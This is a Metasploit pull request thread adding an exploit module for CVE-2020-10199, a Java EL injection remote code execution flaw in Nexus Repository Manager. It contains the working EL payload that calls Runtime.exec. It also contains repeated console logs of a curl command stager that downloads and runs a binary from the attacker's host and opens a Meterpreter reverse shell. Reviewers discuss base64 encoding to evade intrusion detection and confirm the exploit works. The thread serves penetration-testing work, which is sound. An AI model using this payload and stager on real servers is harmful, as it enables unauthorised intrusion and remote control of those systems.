[WIP] Add Nexus Repository Manager Java EL Injection RCE
rapid7/metasploit-framework pull request #13195
Opened 2020-04-04 05:02 UTC by wvu-r7

# WIP

You can read the writeup this module is based on: https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype.

## To-do

- [ ] Investigate pre-auth RCE: https://twitter.com/iamnoooob/status/1246182773427240967

## Example

```
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.0-05 is a vulnerable version.
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=20e9c29d-fb8b-478d-b3a4-e8a3344d9a49;
[*] Using URL: http://0.0.0.0:8080/2TqyQpS
[*] Local IP: http://192.168.1.3:8080/2TqyQpS
[*] Generated command stager: ["curl -so /tmp/SLpbmVBX http://192.168.1.3:8080/2TqyQpS", "chmod +x /tmp/SLpbmVBX", "/tmp/SLpbmVBX", "rm -f /tmp/SLpbmVBX"]
[*] Executing command: curl -so /tmp/SLpbmVBX http://192.168.1.3:8080/2TqyQpS
[+] Successfully executed command: curl -so /tmp/SLpbmVBX http://192.168.1.3:8080/2TqyQpS
[*] Client 192.168.1.3 (curl/7.61.1) requested /2TqyQpS
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  50.00% done (54/108 bytes)
[*] Executing command: chmod +x /tmp/SLpbmVBX
[+] Successfully executed command: chmod +x /tmp/SLpbmVBX
[*] Command Stager progress -  70.37% done (76/108 bytes)
[*] Executing command: /tmp/SLpbmVBX
[+] Successfully executed command: /tmp/SLpbmVBX
[*] Command Stager progress -  82.41% done (89/108 bytes)
[*] Executing command: rm -f /tmp/SLpbmVBX
[+] Successfully executed command: rm -f /tmp/SLpbmVBX
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62015) at 2020-04-03 23:57:56 -0500
[*] Command Stager progress - 100.00% done (108/108 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 5c29594842aa (uid=200, gid=200, euid=200, egid=200)
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

2020-04-04 05:38 UTC, bcoles commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    unless (cookie = res.get_cookies).start_with?('NXSESSIONID')
`get_cookies` returns a `;` concatenated string of all cookies. It is probably unreliable to presume the `NXSESSIONID` cookie will be first, especially when exploiting via a reverse proxy which may add or reorder cookies.

```suggestion
    unless (cookie = res.get_cookies).include?('NXSESSIONID=')
```

2020-04-04 05:38 UTC, bcoles commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
As this module does not define `BadChars` it might be a good idea to hard code a base64 decode in Java here, and Base64 encode `cmd`, presuming there is sufficient space. While Base64 encoding may increase NIDS detection, the use of `java.lang.Runtime` in combination with `getClass` and `exec` is more telling. Optionally, as `java.lang.Runtime` is a string it could also be base64 encoded, presuming sufficient space.

2020-04-04 05:43 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    unless (cookie = res.get_cookies).start_with?('NXSESSIONID')
Great point.

2020-04-04 05:48 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
I didn't notice any badchars, especially with `to_json`, but that's a valid concern.

2020-04-04 05:51 UTC, bcoles commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
> 
> 
> I didn't notice any badchars, especially with `to_json`, but that's a valid concern.

Presumably use of `"` will not end well here: `exec("#{cmd}")`

2020-04-04 05:56 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Yeah, you're right. Looks like it's one level too deep for the `to_json` escaping:

```
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)> puts json_payload('echo "hi"')
{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\"echo \"hi\"\")}"]}}
=> nil
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)>
```

2020-04-04 06:01 UTC, bcoles commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Good point, but I was thinking about what happens when the Java code is executed on the server side at both the Java level and the system shell level.

`exec("echo pot"ato")` will not end well.

2020-04-04 06:15 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
I guess I should clarify: I didn't notice any badchars with my hardcoded `curl` command stager in unconcatenated form. Anything beyond that is liable to break due to badchars (mostly quoting) or the lack of shell passthrough, limiting the use of metachars.

2020-04-04 06:27 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
We could add shell passthrough by invoking `sh -c`, though. Quoting rules apply all the same.

2020-04-04 06:45 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
This could be a naive fix:

```suggestion
    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd.gsub('"', '\\"')}")})
```

2020-04-04 06:56 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
With the patch:

```
[pid   373] execve("/usr/local/sbin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/local/bin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/sbin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/bin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = 0
```

2020-04-04 06:58 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
I would prefer to use Base64 or similar encoding, but I haven't spent any time figuring that out yet. I can commit this fix in the meantime if it's sufficient for quoting.

2020-04-04 07:37 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Committed, since I'm getting successful command execution quote double quotes escaped, but we'll want a more sustainable method if possible.

2020-04-04 07:37 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Committed but leaving unresolved, since I'm getting successful command execution with double quotes escaped, but we'll want a more sustainable method if possible, such as Base64 encoding.

2020-04-08 02:45 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
This will have to happen in a subsequent PR.

2020-04-08 07:28 UTC, wvu reviewed
If you don't want to test the changes to the other modules, that's fine. I've tested them again, all targets.

2020-04-08 07:33 UTC, bcoles commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Without bothering to investigate or test, in my naive opinion, I would have thought implementing a base64 encoder would be fairly straight forward.

Something like this has been used in the framework in the past:

```
modules/exploits/multi/http/jboss_seam_upload_exec.rb:187:            'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
modules/exploits/multi/http/jira_hipchat_template.rb:289:    %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
modules/exploits/multi/http/confluence_widget_connector.rb:127:        $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
```

(that first example is terrible)

2020-04-08 07:45 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
I shouldn't even be committing to this PR anymore, but I've still got some time to squeeze. I'll use the last two examples as a lead. Thanks.

2020-04-08 07:59 UTC, timwr commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Why not ARCH_JAVA? :trollface:

2020-04-08 08:06 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
![](https://media1.tenor.com/images/bb601d3184d071cca618f128088b4bf3/tenor.gif)

2020-04-08 08:44 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
Funny enough, I'm actually working on a remote classloading exploit right now. So maybe. :P

2020-04-08 08:47 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
And https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf has a potential example:

![image](https://user-images.githubusercontent.com/4551878/78764100-af5f7c00-794b-11ea-8e8f-39e2fd1026a1.png)

2020-04-14 22:22 UTC, gwillcox-r7 commented
@wvu-r7 Will take a look at this given I'm also looking into the LifeRay PR which is related.

2020-04-15 04:33 UTC, wvu-r7 commented
There are a lot of changes in this PR. I apologize. This should not happen in a normal PR, but the changes were related to the work I was doing (such as in #13213), and I couldn't stop myself from making them.

The modules have been retested, so don't feel the need to test everything. Or do!

If you'd like me to explain any changes, feel free to ask!

2020-04-15 21:01 UTC, wvu-r7 commented
Miscellaneous module fixes moved to #13259. Cheers!

2020-04-15 22:08 UTC, gwillcox-r7 requested changes
@wvu-r7 Overall looking very good, a few areas to fix up as it seems some extra code was left in there and I wanted some clarification on a few things, then should be able to retest it and merge.

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    execute_cmdstager(
Can you add some context to this command? The exploit() function itself is super short and I have never seen this function being used before so a quick few lines explaining what this does would help a lot considering the overall shortness of this exploit() function. Ideally would like to see an explanation of what this will call and the traversal through the module to call the necessary functions, all wrapped up in some sort of summary.

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def execute_command(cmd, opts = {})
Where is this function called from? I don't see any references to it in the code? A short comment explaining this would be handy.

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +      'partial'    => true # XXX: Return partial response despite timeout
Just confirming is this marked with XXX due to potential for errors?

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  # http://localhost:8081/#admin/system/api
Thanks for including this in here :)

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
Can we align this and the following line indentation wise please?

2020-04-15 22:08 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
Nice this will be very helpful for those looking into the details of this bug more!

2020-04-15 22:40 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
> +[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
This is in the library. I wouldn't remove it. It is useful to see the entire command stager before it is executed, especially when module developers fail to print anything themselves.

It also won't be printed unless the user sets the `VERBOSE` option... which many of us do globally.

2020-04-15 22:41 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    execute_cmdstager(
After further discussion with @wvu-r7 I determined this is part of the mixin for MSF::Exploit::CommandStager and this was just me not understanding how that mixin worked.

Anyone interested can find the documentation for this function at https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/CmdStager.html#execute_command-instance_method and this part is just overwriting the default implementation for this module instance, which by default just returns an error stating the method is not implemented.

2020-04-15 22:42 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def post_auth?
Nope, we shouldn't remove this. Please see #10505.

2020-04-15 22:44 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # GET / response contains the Server header with version information
I tried to fit in under 80 columns. That's why. :P

2020-04-15 22:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def execute_command(cmd, opts = {})
Futher discussion with @wvu-r7: Basically this is part of the `Msf::Exploit::CmdStager` mixin and we are overwriting the default nonfunctional `execute_command` function which is detailed at https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/CmdStager.html#execute_command-instance_method

2020-04-15 22:44 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # GET / response contains the Server header with version information
I tried to fit it under 80 columns. That's why. :P

2020-04-15 22:46 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # Server: Nexus/3.21.1-01 (OSS)
I snuck this in before you got to this PR. :P

Thank you for asking for more context.

2020-04-15 22:46 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    execute_cmdstager(
Update: After speaking to @wvu-r7 I realized this is actually a fairly standard part of the `Msf::Exploit::CmdStager` mixin. Apologies for the confusion @wvu-r7!

2020-04-15 22:48 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    execute_cmdstager(
It's all part of `CmdStager`, which is a standard mixin we employ for dropper payloads. But yeah, I can comment it. I usually do a print for the target type, but `CmdStager` is the only target.

2020-04-15 22:49 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def execute_command(cmd, opts = {})
`CmdStager` again. See the `include` lines at the top.

2020-04-15 22:50 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +      'partial'    => true # XXX: Return partial response despite timeout
Yep. It's not a workaround for workaround's sake. It's a dragon.

2020-04-15 22:50 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  # http://localhost:8081/#admin/system/api
Thanks for asking for more context in the other PR!

2020-04-15 22:52 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
What's wrong with it? I prefer to align all my hashrockets so my eyes can scan LHS and RHS quickly. YMMV. I might even change out of that style habit.

2020-04-15 22:53 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
Yeah. You are right that a link itself isn't that helpful. It wasn't clear what I used the resource for, so I added clarification. Thanks!

2020-04-15 23:03 UTC, wvu-r7 commented on documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
> +[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
What we really need is to revive `print_debug`.

2020-04-15 23:08 UTC, adfoster-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
Alternatively: Can we run rubocop on this file? 🎉

```
rubocop -a modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
```

2020-04-15 23:11 UTC, wvu-r7 commented
@gwillcox-r7: This is how it _should_ look with `VERBOSE` unset.

```
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
[*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
[*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
[+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
[*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  51.79% done (58/112 bytes)
[+] Successfully executed command: chmod +x /tmp/AsZIBdaY
[*] Command Stager progress -  71.43% done (80/112 bytes)
[+] Successfully executed command: /tmp/AsZIBdaY
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Meterpreter session 4 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
[+] Successfully executed command: rm -f /tmp/AsZIBdaY
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter >
```

I'm running into some issues disabling `VERBOSE`, though, since it's being stored as a string. Seems like a regression. I had to change the value in Pry. :/

2020-04-15 23:14 UTC, wvu-r7 commented
@gwillcox-r7: This is how it _should_ look with `VERBOSE` unset.

```
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
[*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
[*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
[+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
[*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
[*] Sending payload to 192.168.1.3 (curl/7.61.1)
[*] Command Stager progress -  51.79% done (58/112 bytes)
[+] Successfully executed command: chmod +x /tmp/AsZIBdaY
[*] Command Stager progress -  71.43% done (80/112 bytes)
[+] Successfully executed command: /tmp/AsZIBdaY
[*] Command Stager progress -  83.04% done (93/112 bytes)
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
[+] Successfully executed command: rm -f /tmp/AsZIBdaY
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.

meterpreter >
```

I'm running into some issues disabling `VERBOSE`, though, since it's being stored as a string. Seems like a resurgence of #10179/#10240. I had to change the value in Pry. :/ @adfoster-r7

2020-04-15 23:14 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
> +[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
Ok if its in the library then thats fine, lets not do a global modification here :) Will mark this as resolved.

2020-04-15 23:16 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def post_auth?
Was not aware of this, thanks for pointing this out. Another case of indirect references. Looks good so marking it as resolved 👍

2020-04-15 23:16 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    execute_cmdstager(
I actually added the print and comment.

2020-04-15 23:16 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # GET / response contains the Server header with version information
Ah fair, in that case could we split it into two lines with the longer explanation?

2020-04-15 23:17 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +      'partial'    => true # XXX: Return partial response despite timeout
Sounds good, marking as resolved.

2020-04-15 23:18 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +  def execute_command(cmd, opts = {})
Commented this anyway!

2020-04-15 23:18 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # GET / response contains the Server header with version information
Yeah, that's fine! I'm a jerk. :)

2020-04-15 23:22 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
```
1 file inspected, 60 offenses detected, 59 offenses corrected
```

Result of running RuboCop on that file.

2020-04-15 23:24 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +    # GET / response contains the Server header with version information
Updated! Explained the whole `check` method. Much nicer!

2020-04-15 23:25 UTC, wvu-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
No, thanks. :P

2020-04-15 23:29 UTC, gwillcox-r7 commented
> @gwillcox-r7: This is how it _should_ look with `VERBOSE` unset.
> 
> ```
> msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
> 
> [*] Started reverse TCP handler on 192.168.1.3:4444
> [*] Executing automatic check (disable AutoCheck to override)
> [+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
> [*] Executing command stager for linux/x64/meterpreter_reverse_tcp
> [*] Logging in with admin:admin
> [+] Logged in with NXSESSIONID=547a9664-8d8b-43cb-bf7d-e6c30e71c75d;
> [*] Using URL: http://0.0.0.0:8080/TI0jO3EebzZ
> [*] Local IP: http://192.168.1.3:8080/TI0jO3EebzZ
> [+] Successfully executed command: curl -so /tmp/AsZIBdaY http://192.168.1.3:8080/TI0jO3EebzZ
> [*] Client 192.168.1.3 (curl/7.61.1) requested /TI0jO3EebzZ
> [*] Sending payload to 192.168.1.3 (curl/7.61.1)
> [*] Command Stager progress -  51.79% done (58/112 bytes)
> [+] Successfully executed command: chmod +x /tmp/AsZIBdaY
> [*] Command Stager progress -  71.43% done (80/112 bytes)
> [+] Successfully executed command: /tmp/AsZIBdaY
> [*] Command Stager progress -  83.04% done (93/112 bytes)
> [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62148) at 2020-04-15 18:10:14 -0500
> [+] Successfully executed command: rm -f /tmp/AsZIBdaY
> [*] Command Stager progress - 100.00% done (112/112 bytes)
> [*] Server stopped.
> 
> meterpreter >
> ```
> 
> I'm running into some issues disabling `VERBOSE`, though, since it's being stored as a string. Seems like a resurgence of #10179/#10240. I had to change the value in Pry. :/ @adfoster-r7

Hmm odd this looks exactly the same as the output above, so not seeing what `VERBOSE` is adding? Unless thats the point of the example?

2020-04-15 23:36 UTC, wvu-r7 commented
Oh, it's different. It's less verbose. :P

2020-04-15 23:53 UTC, gwillcox-r7 commented
Confirmed that this exploit works and setup instructions are correct:

```
msf5 > use exploit/linux/http/nexus_repo_manager_el_injection 
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > show options

Module options (exploit/linux/http/nexus_repo_manager_el_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Nexus password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8081             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       Nexus username
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Nexus Repository Manager <= 3.21.1


msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set LHOST 192.168.1.124
LHOST => 192.168.1.124
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > exploit

[*] Started reverse TCP handler on 192.168.1.124:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
[*] Executing command stager for linux/x64/meterpreter_reverse_tcp
[*] Logging in with admin:admin
[+] Logged in with NXSESSIONID=3b13e129-1044-4012-9196-5a94d5f9cd68;
[*] Using URL: http://0.0.0.0:8080/QUg9CbPGd5
[*] Local IP: http://192.168.1.124:8080/QUg9CbPGd5
[*] Client 192.168.1.124 (curl/7.61.1) requested /QUg9CbPGd5
[*] Sending payload to 192.168.1.124 (curl/7.61.1)
[+] Successfully executed command: curl -so /tmp/nVmWGeTu http://192.168.1.124:8080/QUg9CbPGd5
[*] Command Stager progress -  52.21% done (59/113 bytes)
[+] Successfully executed command: chmod +x /tmp/nVmWGeTu
[*] Command Stager progress -  71.68% done (81/113 bytes)
[+] Successfully executed command: /tmp/nVmWGeTu
[*] Command Stager progress -  83.19% done (94/113 bytes)
[+] Successfully executed command: rm -f /tmp/nVmWGeTu
[*] Meterpreter session 1 opened (192.168.1.124:4444 -> 192.168.1.124:56005) at 2020-04-15 18:51:09 -0500
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: no-user @ 905978a0c662 (uid=200, gid=200, euid=200, egid=200)
meterpreter > shell
Process 465 created.
Channel 1 created.
pwd
/opt/sonatype/nexus
ls
NOTICE.txt
OSS-LICENSE.txt
PRO-LICENSE.txt
bin
deploy
etc
lib
public
system
```

2020-04-16 00:02 UTC, gwillcox-r7 approved these changes
Looks good, changes approved :)

2020-04-16 00:25 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
> +        'blobStoreName'               => 'default',
After discussion with @adfoster-r7 and @wvu-r7, it seems like this is fine for now as is. If we need to update to fix RuboCop issues we can do this at a later date.

2020-04-16 00:29 UTC, merged

2020-04-16 00:41 UTC, gwillcox-r7 commented
# Release Notes

This PR adds support for exploiting CVE-2020-10199, an authenticated Java EL Injection RCE in Nexus Repository Manager 3.x for versions 3.21.1 and prior. Successful exploitation results in RCE as the user `nexus`.